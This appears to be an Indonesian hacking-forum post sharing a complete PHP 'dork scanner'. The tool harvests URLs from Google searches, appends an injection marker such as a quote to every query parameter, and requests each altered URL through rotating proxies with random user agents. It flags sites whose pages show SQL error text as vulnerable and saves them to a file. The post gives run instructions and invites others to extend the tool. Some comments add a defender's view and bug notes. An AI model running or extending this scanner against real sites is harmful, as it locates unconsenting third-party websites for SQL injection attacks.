
Simple Sqli Dork Scanner

ijin share dork scan punya ane
mohon dikembangkan lagi gan

<?php
//Coded by RieqyNS13
//Greeting to Allah swt and all devilzc0de.org members
// Command-line scanner. It pages through Google results for a search query ("dork"),
// appends a marker string to every query-string value of each result URL, requests
// the modified URL and reports the target as "vuln" when the response body contains
// database/PHP error text.
// Defender view: traffic produced by this class has the same suffix attached to every
// parameter value of a request, and the check only works when the application prints
// raw database/PHP errors to the client. Parameterised queries and disabled error
// display remove both the flaw and the signal this code depends on.
class rieqyns13{
// Search query sent to Google by scandork().
public $dork;
// Limit compared against the scanned-URL counter in the scandork() loop condition.
public $jumlah;
// String that parse() appends to each query parameter value.
public $key;
// Path of the file that simpan() appends flagged URLs to.
public $simpan;
// When true, cekurls() reduces a result page to one URL per host.
public $hapus_yg_sama;
// When true, graph() sends requests through the address returned by proxy().
public $proxy;
// Path of the text file that proxy() reads candidate proxies from.
public $proxy_file;
// Browser User-Agent strings. graph() calls array_rand() on this list (see the note there).
private $useragent = array(
'Mozilla/5.0 (X11; Linux i686) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.52 Safari/536.5',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11',
'Opera/9.25 (Windows NT 5.1; U; en)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.12) Gecko/20070731 Ubuntu/dapper-security Firefox/1.5.0.12',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.102011-10-16 20:23:50',
'Mozilla/5.0 (BlackBerry; U; BlackBerry 9800; en) AppleWebKit/534.1+ (KHTML, like Gecko) Version/6.0.0.337 Mobile Safari/534.1+2011-10-16 20:21:10',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.0',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6'
);
// Returns every substring of $var that sits between $start and $end (non-greedy),
// or null when nothing matches or the regex call fails.
function match($start, $end, $var){
return preg_match_all("|".preg_quote($start).'(.*?)'.preg_quote($end)."|", $var, $m) ? $m[1] : null;
}
// Performs one HTTP request with cURL and returns whatever curl_exec() returns
// (the response body, or false on failure).
// Mode 1: $dork is non-null and $x is numeric -> Google search page at result offset $x.
// Mode 2: $url is non-null and $x loosely equals null -> fetch $url as given.
// When neither condition holds, no URL is set on the handle.
function graph($dork=null, $x, $url=null){
$ch = curl_init();
if($dork != null && is_numeric($x)){
// The "&amp;" is sent literally, so the parameter name on the wire is "amp;ie".
// NOTE(review): looks like an HTML-escaping artifact of the blog post - confirm.
curl_setopt($ch, CURLOPT_URL, "http://www.google.com/search?q=".urlencode($dork)."&amp;ie=UTF-8&start=".urlencode($x));
}elseif($url != null && $x==null){
curl_setopt($ch, CURLOPT_URL, $url);
}
if($this->proxy==true){
curl_setopt($ch, CURLOPT_HTTPPROXYTUNNEL, false);
// proxy() may return an error sentence instead of host:port; it is passed on unchecked.
curl_setopt($ch, CURLOPT_PROXY, $this->proxy());
}
// array_rand() returns a random KEY of the list (0-9 here), not the string stored under it,
// so the value handed to CURLOPT_USERAGENT is that index.
curl_setopt($ch, CURLOPT_USERAGENT, array_rand($this->useragent));
// The peer's TLS certificate is not verified.
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
// Redirects are followed and the Referer header is set automatically on each hop.
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_AUTOREFERER, true );
// 15 seconds for the connection and 15 seconds for the whole transfer.
curl_setopt($ch, CURLOPT_TIMEOUT, 15);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 15);
$exec = curl_exec($ch);
curl_close($ch);
return $exec;
}
// Returns one randomly chosen line of $this->proxy_file with CR/LF characters removed.
// When the file does not exist it returns an Indonesian message
// ("file ... not found, please create it first") rather than signalling an error;
// "@" hides any warning raised by is_file().
function proxy(){
if(@is_file($this->proxy_file)){
$file = file($this->proxy_file);
return str_replace(array("\n", "\r", "\r\n"), "", $file[array_rand($file)]);
}else return "tidak ada file {$this->proxy_file}, tolong buat dulu";
}
// Builds the probe URL: returns $url with $this->key appended to the value of every
// query parameter. A URL without a query string is returned unchanged.
// Only scheme, host, path and the rebuilt query are emitted; port, credentials and
// fragment of the input are not. parse_str() URL-decodes names and values and turns
// dots and spaces in parameter names into underscores; nothing is re-encoded here.
// NOTE(review): an array-style parameter (a[]=1) makes $ar[$a] an array, and a URL
// without a path leaves $arr['path'] unset - neither case is handled.
function parse($url){
// Strip CR/LF from the marker (it is read with fgets() and keeps its newline).
$this->key = str_replace(array("\n", "\r", "\r\n"), "", $this->key);
$arr = parse_url($url);
if(empty($arr['query'])){
return $url;
}
parse_str($arr['query'], $ar);
$key = array_keys($ar);
foreach($key as $a){
$x[] = $a."=".$ar[$a].$this->key;
}
$imp = implode("&", $x);
return $arr['scheme']."://".$arr['host'].$arr['path']."?".$imp;
}
// Appends $url and a newline to the file named by $this->simpan.
// The fopen() result is not checked before writing.
function simpan($url){
$fp = fopen($this->simpan, "a");
fwrite($fp, $url."\n");
fclose($fp);
}
// Post-processes one page of result URLs.
// With $this->hapus_yg_sama false the input is returned untouched. Otherwise each URL
// is split with parse_url() and one URL per distinct host is rebuilt and returned.
// When no host was collected, an error text is echoed and nothing is returned (null).
// NOTE(review): match() yields null when a page has no results; count(null) raises a
// warning on PHP 7.2+ and a TypeError on PHP 8.
function cekurls($urls){
$urlv = null;
if($this->hapus_yg_sama==false) return $urls;
elseif($this->hapus_yg_sama==true){
for($a=0; $a<count($urls); $a++){
$dev = parse_url($urls[$a]);
// "@" hides the notice for a missing component; null is stored in that slot.
@$scheme[] = $dev['scheme'];
@$host[] = $dev['host'];
if(empty($dev['path'])) $path[] = null;
elseif(!empty($dev['path'])) $path[] = $dev['path'];
if(empty($dev['query'])) $prm[] = null;
elseif(!empty($dev['query'])) $prm[] = $dev['query'];
}
if(isset($host)){
// array_unique() keeps the first key of each host, so $key indexes the parallel arrays.
$unik = array_unique($host);
foreach($unik as $key=>$url){
// $prm is overwritten here with a string (or null), so from the second unique host
// onwards $prm[$key] no longer reads the query strings collected above.
if(!empty($prm[$key])){
$prm = "?".$prm[$key];
}elseif(empty($prm[$key])) $prm = null;
$urlv[] = $scheme[$key]."://".$url.$path[$key].$prm;
}
return $urlv;
}elseif(!isset($host) && $this->proxy==false) echo "[Error] ";
elseif(!isset($host) && $this->proxy==true) echo "[Proxy mungkin tidak valid] ";
}
}
// Main loop: fetch a Google result page, extract and filter the result URLs, request
// the modified form of each one and classify the response by error-text matching.
// Flagged URLs are echoed and written through simpan(); per-page timing is printed.
// The limit is only tested between pages, so the final count can exceed $this->jumlah.
function scandork(){
$dork = $this->dork;
$dork = str_replace(array("\n", "\r", "\r\n"), "", $dork);
$start=0;
$jumlah=0;
$page=0;
$total=0;
while($jumlah<=$this->jumlah){
$a=0;
$graph = $this->graph($dork, $start, null);
$match = $this->match('<h3 class="r"><a href="/url?q=', '&amp;sa=U&amp;', $graph);
$cekurls = $this->cekurls($match);
if(count($cekurls)==0){
echo "hasil tidak ada atau ada halangan captcha :p\n";
// Neither $start nor $jumlah changes before "continue", so the same search request is
// repeated immediately, without delay, for as long as the page yields no URLs.
continue;
}
$mulai = time();
foreach($cekurls as $url){
$urlp = $this->parse(urldecode($url));
$graph = $this->graph(null, null, $urlp);
// Classification is by response text only. "Syntax error" and "Fatal error" also match
// ordinary PHP errors unrelated to SQL, so a hit is an indication, not a confirmation.
// NOTE(review): "mysql_fetch\?\?_row" matches two literal question marks - possibly garbled.
if(preg_match("/error in your SQL syntax|mysql_fetch_array\(\)|execute query|mysql_fetch_object\(\)|mysql_num_rows\(\)|mysql_fetch_assoc\(\)|mysql_fetch\?\?_row\(\)|SELECT \* FROM|supplied argument is not a valid MySQL|Syntax error|Fatal error/i", $graph)){
echo "vuln -> ".urldecode($urlp)."\n";
$this->simpan($urlp);
$a++;
}else{
echo "NOT vuln - > ".urldecode($urlp)."\n";
}
$jumlah++;
}
// Each value is the whole elapsed time in a different unit (seconds, minutes, hours),
// not an h:m:s breakdown.
$selang = time() - $mulai;
$detik = round($selang);
$menit = round($selang / 60);
$jam = round($selang / 3600);
// Advance the Google result offset by the number of URLs kept for this page.
$start=$start+count($cekurls);
$page++;
echo "Selesai scan page {$page} dalam : {$jam} jam {$menit} menit {$detik} detik\n\n";
}
echo "Jumlah situs yang discan {$jumlah}\n";

}

}
// Driver: reads the search query and the marker string from stdin, sets the options
// on the scanner object and starts the scan.
echo "simple dork scanner by rieqyns13\n\n";
$dc = new rieqyns13;
echo "Masukkan dork = ";
$fp = fopen("php://stdin", "rb"); //the dork (search query)
// fgets() keeps the trailing newline; scandork() and parse() strip CR/LF later.
$str = fgets($fp);
echo "Masukkan simbol/key = "; //symbol inserted into the URL
$key = fgets($fp);
fclose($fp);
///OPTION///////////////////////////////////
$dc->hapus_yg_sama = true; //true to remove identical URLs within each page, false to keep them
$dc->proxy = true; //true to use a proxy listed in $dc->proxy_file, false to connect without a proxy
$dc->proxy_file = "proxylist.txt"; //used when $dc->proxy=true; every proxy in the file must be written as proxy:port, e.g. "914.143.141.131:8080"
$dc->jumlah = 300; //number of sites to scan
////////////////////////////////////////////
$dc->dork = $str;
$dc->key = $key;
// Output file that flagged URLs are appended to.
$dc->simpan = "url_vuln.txt";
$dc->scandork();
?>
copas ke notepad trus simpan dgn extensi php, trus buka cmd, masuk ke path dmana taruh file php tadi, trus jalanin pke printah php scan.php, dgn syarat path nya harus udah ditambahin/diatur ke c:\xampp\php


dan ini gambar jika menggunakan proxy
tuh berarti proxy yg dipke harus bener2 FRESH dan tahan lama, jika tidak, maka beberapa url atau bahkan semua url tidak bisa digraph.
skarang penjelasan selanjutnya.
tuh konsep dari dork scanner ane,  jika url ada parameter tertentu kya gini misal:
http://site.com/detail.php?id=2&next.asp?cat=21&gay.cfm?id=null
ntar dirubah ke
http://site.com/detail.php?id=2'&next_asp?cat=21'&gay_cfm?id=null'

sesuai dengan simbol yg dimasukkan.
jika url tidak ada parameter kya di atas, akan direturn ke url aslinya
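ane cuman bisa nangkep site vuln berdasarkan pesan sql error pada umumnya gan, jadi site keluar gak terlalu banyak. hasilnya juga cuma indikasi, bukan bukti: pola "Syntax error" dan "Fatal error" cocok juga sama error PHP biasa yg gak ada hubungannya dgn SQL, jadi yg ditandai "vuln" bisa aja salah deteksi. ni gan buat ngecek apakah tuh site vuln ato kagak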
if(preg_match("/error in your SQL syntax|mysql_fetch_array\(\)|execute query|mysql_fetch_object\(\)|mysql_num_rows\(\)|mysql_fetch_assoc\(\)|mysql_fetch\?\?_row\(\)|SELECT \* FROM|supplied argument is not a valid MySQL|Syntax error|Fatal error/i", $graph))
pngalam ane klo keseringan pke dork yg kompleks, biasanya diblock ama captcha gan
mohon dikembangin lagi biar bisa menjadi tool yg advanced gan